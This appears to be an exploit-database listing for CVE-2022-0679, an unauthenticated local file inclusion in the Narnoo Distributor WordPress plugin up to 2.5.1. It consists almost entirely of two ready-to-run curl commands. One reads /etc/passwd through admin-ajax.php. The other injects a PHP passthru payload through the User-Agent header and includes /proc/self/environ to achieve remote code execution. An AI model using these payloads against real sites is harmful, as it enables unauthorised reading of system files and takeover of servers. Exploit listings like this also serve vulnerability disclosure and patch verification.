Exploit for Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE CVE-2022-0679

Name: Exploit for Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE CVE-2022-0679
Rating: 5 (367 reviews)

2022-03-01 | CVSS 9.8

## https://sploitus.com/exploit?id=WPEX-ID:0EA79EB1-6561-4C21-A20B-A1870863B0A8
curl https://example.com/wp-admin/admin-ajax.php --data 'action=narnoo_distributor_lib_request&lib_path=/etc/passwd'

Assuming the web user (www-data) can read from /proc/self/environ, the following curl command can be used to trigger RCE:

curl https://example.com/wp-admin/admin-ajax.php --data 'action=narnoo_distributor_lib_request&lib_path=/proc/self/environ' -H 'User-Agent: <?= passthru("id"); =>'